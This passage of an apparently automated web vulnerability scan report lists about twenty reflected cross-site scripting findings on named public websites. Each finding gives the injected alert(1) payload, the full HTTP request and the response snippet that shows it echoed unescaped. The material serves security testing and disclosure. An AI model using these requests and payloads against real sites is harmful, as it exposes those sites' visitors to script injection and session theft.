<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<meta name="keywords" content="Rex Reed4f7cf"><img Src=a Onerror=alert(1)>cf90738becb" />
...[SNIP]...

3.96. http://www.observer.com/author/rex-reed [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.observer.com
Path:	/author/rex-reed

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3692c"><script>alert(1)</script>88d8656a531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /author/rex-reed?3692c"><script>alert(1)</script>88d8656a531=1 HTTP/1.1
Host: www.observer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:53 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.0-8+etch13
Cache-Control: max-age=300, must-revalidate
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Set-Cookie: SESS0787a3dbcceb3bde8559916a896fa4dd=2739662a9d2c1b42e74d4fe1be78fb88; expires=Wed, 23 Mar 2011 17:11:13 GMT; path=/; domain=.observer.com
Connection: close
Content-Length: 38577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="/node/137699?3692c"><script>alert(1)</script>88d8656a531=1">
...[SNIP]...

3.97. http://www.ohm-chamonix.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ohm-chamonix.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04d1"><script>alert(1)</script>4e9bd0bc990 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e04d1"><script>alert(1)</script>4e9bd0bc990=1 HTTP/1.1
Host: www.ohm-chamonix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37101
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQATTTCT=KKCKAEEBEFNIOJCGPPMIJEHA; path=/
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:37:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Sommair
...[SNIP]...
<a href="/Default.asp?id_lang=2&ampe04d1"><script>alert(1)</script>4e9bd0bc990=1">
...[SNIP]...

3.98. http://www.omeda.com/cgi-win/cso.cgi [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omeda.com
Path:	/cgi-win/cso.cgi

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98d19<script>alert(1)</script>c5fa55260e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win98d19<script>alert(1)</script>c5fa55260e8/cso.cgi HTTP/1.1
Host: www.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:37:47 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 311

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-win98d19<script>alert(1)</script>c5fa55260e8/cso.cgi<P>
...[SNIP]...

3.99. http://www.omeda.com/cgi-win/cso.cgi [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omeda.com
Path:	/cgi-win/cso.cgi

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd63e<script>alert(1)</script>a3b84134b87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cso.cgifd63e<script>alert(1)</script>a3b84134b87 HTTP/1.1
Host: www.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:37:48 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 304

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-win/cso.cgifd63e<script>alert(1)</script>a3b84134b87<P>
...[SNIP]...

3.100. http://www.omeda.com/cgi-win/cso.cgi [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omeda.com
Path:	/cgi-win/cso.cgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3683"><script>alert(1)</script>65a8b28aa1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cso.cgi?c3683"><script>alert(1)</script>65a8b28aa1c=1 HTTP/1.1
Host: www.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 28 Feb 2011 13:37:41 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 40300

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>CSO Magazine FREE Subscription Application</title
...[SNIP]...
<input type="hidden" name="CALLINGURL" value="c3683"><script>alert(1)</script>65a8b28aa1c=1">
...[SNIP]...

3.101. http://www.openforum.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.openforum.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57900'-alert(1)-'3b360cbf756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?57900'-alert(1)-'3b360cbf756=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Feb 2011 13:37:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:37:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/
Content-Length: 105590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3f57900'-alert(1)-'3b360cbf756%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?57900'-alert(1)-'3b360cbf756%3d1';
   /*]]>
...[SNIP]...

3.102. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outsourcingdotnetdevelopment.com
Path:	/xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc65b"><script>alert(1)</script>5240444a383 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss-cross-site-scripting.html?dc65b"><script>alert(1)</script>5240444a383=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=6506m8f92ju1v9a6q2mmp0eqo3; path=/
Connection: close
Content-Type: text/html
Content-Length: 21474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
<form id="contactus" method="post" action="/xss-cross-site-scripting.html?dc65b"><script>alert(1)</script>5240444a383=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

3.103. http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.palmblvd.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bd6f1--><script>alert(1)</script>8d9476bb958 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bd6f1--><script>alert(1)</script>8d9476bb958=1 HTTP/1.1
Host: www.palmblvd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:47 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:38:47 GMT
Connection: close
Content-Type: text/html
Content-Length: 83111

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>Palm Boulevard - The Complete Palm OS Information Resource - (Palm Pilot Shareware) - Handspring Visor, Sony Clie, Handera, TRGPr
...[SNIP]...
<script>alert(1)</script>8d9476bb958=1 -->
...[SNIP]...

3.104. http://www.parentdish.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.parentdish.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cc3c"><script>alert(1)</script>055763a2607 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5cc3c"><script>alert(1)</script>055763a2607=1 HTTP/1.1
Host: www.parentdish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=dallas%3A%3Atx%3A%3Ausa%3A%3A%3A%3Abroadband%3A%3A032.787%3A%3A-096.799%3A%3A5%3A%3A4%3A%3A3%3A%3Aok; expires=Tue, 01-Mar-2011 13:37:45 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 64525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.parentdish.com/?5cc3c"><script>alert(1)</script>055763a2607=1" />
...[SNIP]...

3.105. http://www.parkcityinfo.com/visitors/lodging-hotels/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.parkcityinfo.com
Path:	/visitors/lodging-hotels/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d567d"><script>alert(1)</script>72aa3f880de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /visitors/lodging-hotels/?d567d"><script>alert(1)</script>72aa3f880de=1 HTTP/1.1
Host: www.parkcityinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=3385798;expires=Wed, 20-Feb-2041 13:42:42 GMT;path=/
Set-Cookie: CFTOKEN=16832573;expires=Wed, 20-Feb-2041 13:42:42 GMT;path=/
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:42:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
                   <html xmlns="http://www.w3.org/1999/xhtml">
                   <head>

           <met
...[SNIP]...
<a class="summer active" rel="1" href="./?SEASON=1&eventID=0&e_sDate=02%2D28%2D11&e_ViewBy=week&e_catID=0&e_keyword=&randomNum=0&e_eDate=&e_pageSize=25&e_pageNum=1&isFeatured=0&startRow=1&d567d"><script>alert(1)</script>72aa3f880de=1&e_sortBy=eventDate&e_cDate=&">
...[SNIP]...

3.106. http://www.pawnation.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pawnation.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76e28"><script>alert(1)</script>68d4300f71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?76e28"><script>alert(1)</script>68d4300f71=1 HTTP/1.1
Host: www.pawnation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:47 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=dallas%3A%3Atx%3A%3Ausa%3A%3A%3A%3Abroadband%3A%3A032.787%3A%3A-096.799%3A%3A5%3A%3A4%3A%3A3%3A%3Aok; expires=Tue, 01-Mar-2011 13:37:47 GMT; path=/
Keep-Alive: timeout=5, max=999817
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Paw Nation - Your Sou
...[SNIP]...
<link rel="canonical" href="http://www.pawnation.com/?76e28"><script>alert(1)</script>68d4300f71=1" />
...[SNIP]...

3.107. http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pdastreet.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b5172--><script>alert(1)</script>b1e6f3a905c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b5172--><script>alert(1)</script>b1e6f3a905c=1 HTTP/1.1
Host: www.pdastreet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:51 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:38:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 68576

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>PDAStreet - The PDA Network for Handheld Computers, PDA Software, Windows CE, Pocket PC, Palm Pilot, Psion, iPaq, Pocket PC 2002,
...[SNIP]...
<script>alert(1)</script>b1e6f3a905c=1 -->
...[SNIP]...

3.108. http://www.peppernews.eu/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peppernews.eu
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91bb0"><script>alert(1)</script>e2cca4fc6b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?91bb0"><script>alert(1)</script>e2cca4fc6b8=1 HTTP/1.1
Host: www.peppernews.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:09 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=e3ne12b463juklv1ubk7k51rig5ffato; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 77062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="return" value="/?91bb0"><script>alert(1)</script>e2cca4fc6b8=1" />
...[SNIP]...

3.109. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.politicsdaily.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd8ea"-alert(1)-"facdad95d64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fd8ea"-alert(1)-"facdad95d64=1 HTTP/1.1
Host: www.politicsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 100254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Politics News, Elec
...[SNIP]...
litics";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,politicsdaily.com";
s_265.mmxgo = true;
s_265.prop1="Politics Daily";
s_265.prop2="Home";
s_265.prop12="http://www.politicsdaily.com/?fd8ea"-alert(1)-"facdad95d64=1";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.110. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.politicsdaily.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06d4"><script>alert(1)</script>27c3e4551c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b06d4"><script>alert(1)</script>27c3e4551c5=1 HTTP/1.1
Host: www.politicsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999990
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 100326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Politics News, Elec
...[SNIP]...
<link rel="canonical" href="http://www.politicsdaily.com/?b06d4"><script>alert(1)</script>27c3e4551c5=1"/>
...[SNIP]...

3.111. http://www.popeater.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e413"-alert(1)-"7b6f42f0884 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9e413"-alert(1)-"7b6f42f0884=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=dallas%3A%3Atx%3A%3Ausa%3A%3A%3A%3Abroadband%3A%3A032.787%3A%3A-096.799%3A%3A5%3A%3A4%3A%3A3%3A%3Aok; expires=Tue, 01-Mar-2011 13:37:53 GMT; path=/
Keep-Alive: timeout=5, max=999977
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 63971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
" ;
s_265.linkInternalFilters="javascript:,popeater.com";
    s_265.prop2="news";
    s_265.prop1="popeater";
    s_265.prop6custom="";
    s_265.prop12= "http://www.popeater.com/?9e413"-alert(1)-"7b6f42f0884=1";
    s_265.channel="us.newspop";
    s_265.disablepihost=false;
    s_265.disablepipath=false;
    s_265.mmxtitle="";
    s_265.mmxcustom="";
    s_265.mmxgo=true;
s_265.t
...[SNIP]...

3.112. http://www.radioshack.com/uc/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.radioshack.com
Path:	/uc/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ce8fa--><script>alert(1)</script>3f295dd3b3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uc/index.jsp?ce8fa--><script>alert(1)</script>3f295dd3b3c=1 HTTP/1.1
Host: www.radioshack.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:01 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Content-Length: 42182
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=3yLhNrlZtSnSQsJM1JjRX0TTLphGYJhsK7kj4fhGYPYcYDd6L465!1257230759; path=/
Set-Cookie: browser_id=126388974473; expires=Thursday, 25-Feb-2021 13:38:01 GMT; path=/
Set-Cookie: browser_id=126388974473; expires=Thursday, 25-Feb-2021 13:38:01 GMT; path=/
Set-Cookie: browser_id=126388974473; expires=Thursday, 25-Feb-2021 13:38:01 GMT; path=/
Set-Cookie: browser_id=126388974473; expires=Thursday, 25-Feb-2021 13:38:01 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<!DOCT
...[SNIP]...
<script>alert(1)</script>3f295dd3b3c=1 -->
...[SNIP]...

3.113. http://www.shelterpop.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shelterpop.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c44"><script>alert(1)</script>1c4106e9fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21c44"><script>alert(1)</script>1c4106e9fe4=1 HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:59 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999453
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 52762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="
...[SNIP]...
<link rel="canonical" href="http://www.shelterpop.com/?21c44"><script>alert(1)</script>1c4106e9fe4=1" />
...[SNIP]...

3.114. http://www.shoppinga.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shoppinga.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f935b"><script>alert(1)</script>f3d7e91300c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f935b"><script>alert(1)</script>f3d7e91300c=1 HTTP/1.1
Host: www.shoppinga.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:15 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=b2ir2jthkv6rs54hublpq35uklnph9k5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62123

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html dir="ltr" lang="de">
<head>
<meta name="msvalidate.01" content="C0594E2AB82AE90F82DE0425FCA782B9" />

...[SNIP]...
<a href="/f935b"><script>alert(1)</script>f3d7e91300c/1/page/2">
...[SNIP]...

3.115. http://www.skiamis.com/catered-search.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.skiamis.com
